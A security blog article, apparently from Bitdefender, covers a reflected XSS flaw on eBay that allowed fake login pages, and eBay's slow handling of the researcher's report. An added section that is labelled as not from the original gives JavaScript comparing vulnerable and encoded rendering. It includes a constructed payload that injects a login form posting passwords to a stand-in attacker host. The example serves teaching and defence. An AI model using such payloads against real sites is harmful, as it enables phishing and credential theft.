eBay XSS Flaw: How Websites Might Help Criminals Phish Customers’ Passwords


It’s 2016, and it would be nice to think that after several years of doing business online, companies have got a better handle on how to protect their websites from attacks.

I’m afraid I have depressing news for you.  Many sites are continuing to make big mistakes.

Well-known threats like cross-site scripting (XSS) attacks continue to challenge many websites, including household names.

Take eBay, for instance.

As Motherboard reports, a security researcher going by the name of MLT discovered a critical XSS flaw on eBay’s website in early December, which could allow malicious hackers to create fraudulent login pages and steal passwords.

As far as the user is concerned, they have clicked on a link to the main ebay.com site and are being asked by eBay to enter their password.  Even sceptical users who check the browser's address bar will probably be reassured that the password request is legitimate, because the page really is being served from ebay.com: with a reflected XSS flaw the attacker's script runs on eBay's own domain, so the address bar offers no warning at all.

MLT has even produced a YouTube video demonstrating the XSS attack against eBay for non-believers, showing how simple it would be to trick users into handing over their passwords to hackers.



If MLT had had malicious intentions he could have spammed thousands if not millions of eBay users, inviting them to click on a link and would have almost certainly scooped up many passwords in the process.

As well as stealing login credentials, the flaw could have also been abused to infect visiting computers with malware.

Instead, MLT chose to inform eBay of the problem on December 11th.

But that is when the next failure happened.

MLT claims that eBay initially responded the following day requesting further details of the flaw, but didn’t respond to any more of the researcher’s emails, and only fixed the vulnerability last week when reporters from Motherboard got in touch.

An XSS flaw which can easily mimic the real eBay login page, and could be abused to target millions of eBay users, is something that should be tackled as a high priority by the company’s security team.  A researcher shouldn’t have to ask for help from a media outlet to get a serious bug like this fixed.

In other words, it’s not just about ensuring your website is secure in the first place.  It’s also about handling reports of vulnerabilities in a timely professional manner, keeping researchers informed as to what you’re doing to fix them and protect your customers.

It’s not as though eBay hasn’t suffered from XSS security flaws in the past.

A flaw like the one MLT discovered should, of course, never exist on a securely coded website: cross-site scripting is prevented by consistently encoding untrusted data before it is written into a page, so that whatever a visitor (or a link they followed) supplies is rendered as text rather than executed as markup or script.

But web programmers are human, and they make mistakes.  Only through the combination of coding experience, code auditing and penetration testing can you feel more confident that your site isn’t one of those exhibiting such a common problem and making life easy for computer criminals and identity thieves.
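To make the point in the previous two paragraphs concrete, here is an added example (not code from the original article, and not the actual eBay bug, whose location on ebay.com the article does not describe). It shows a generic reflected XSS: a search page that concatenates a query parameter straight into its HTML, beside the hardened version that encodes it first. The attacker payload, the `attacker.example` host and the `ebay.com` origin used below are constructed for the illustration.

```javascript
// Added illustration of reflected XSS and its fix. Generic example, NOT the
// real eBay flaw; payload, hosts and page layout are all constructed here.

// Minimal HTML encoding for text placed inside element content or inside a
// double-quoted attribute. Encoding these five characters is enough for those
// two contexts; it is NOT sufficient for JavaScript, CSS or URL contexts.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// VULNERABLE: the search term from the query string is concatenated straight
// into the page. Whatever the attacker puts in ?q= becomes markup that the
// browser renders under the site's own origin.
function renderSearchVulnerable(query) {
  return `<h1>Results for ${query}</h1>`;
}

// HARDENED: same page, but the untrusted value is encoded before it lands in
// the HTML. The browser now shows the payload as literal text.
function renderSearchHardened(query) {
  return `<h1>Results for ${escapeHtml(query)}</h1>`;
}

// Constructed attacker payload (hypothetical): closes the <h1> and injects a
// fake login form that posts to an attacker-controlled host. On a vulnerable
// page the victim sees this form while the address bar shows the real site.
const PAYLOAD =
  '</h1><form action="https://attacker.example/steal" method="POST">' +
  '<p>Please sign in to continue</p>' +
  '<input name="user"><input name="pass" type="password">' +
  '<button>Sign in</button></form><h1>';

// Crude check used by the demo: does the rendered HTML contain a <form>
// whose action points off-site? (A real scanner would parse the DOM rather
// than use a regex; this is only to make the two outputs comparable.)
function containsForeignForm(html, ourOrigin) {
  const m = html.match(/<form[^>]*action="([^"]*)"/i);
  if (!m) return false;
  try {
    return new URL(m[1], ourOrigin).origin !== ourOrigin;
  } catch {
    return true; // unparsable action: treat as suspicious
  }
}

// Stand-alone demo: the origin is a constructed placeholder.
const ORIGIN = 'https://www.ebay.com';
console.log('vulnerable page carries foreign login form:',
  containsForeignForm(renderSearchVulnerable(PAYLOAD), ORIGIN));   // true
console.log('hardened page carries foreign login form:',
  containsForeignForm(renderSearchHardened(PAYLOAD), ORIGIN));     // false
```

The fix is contextual output encoding at the point where untrusted data meets HTML, not input filtering of the query string; a templating engine that escapes by default achieves the same thing without relying on every developer remembering to call `escapeHtml`. A Content Security Policy that disallows inline script is a worthwhile second layer, but note that it would not block the injected form above, which needs no script at all to phish a password.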

If a major website like eBay can’t seem to get its act together, what chance is there that other sites with smaller coding teams will have got things right?

The good news is that there is no indication that the cross-site scripting flaw found on eBay’s website was exploited by criminals.  But websites like XSSposed, which collect details of vulnerable sites and online applications, demonstrate that the problem is widespread and showing no signs of going away.

Regardless of whether you are running a site used by millions of people, or only get a few hundred visitors a day, it is essential that your website has been built with care, and does not contain security flaws that could be exploited by malicious hackers.

And, finally, if and when a flaw is found on your website, it’s critical that you fix it as soon as possible.  eBay was lucky that its XSS flaw was found by a responsible researcher and doesn’t appear to have been exploited – you might not be so lucky.


Virtualization and Cloud Security News from Bitdefender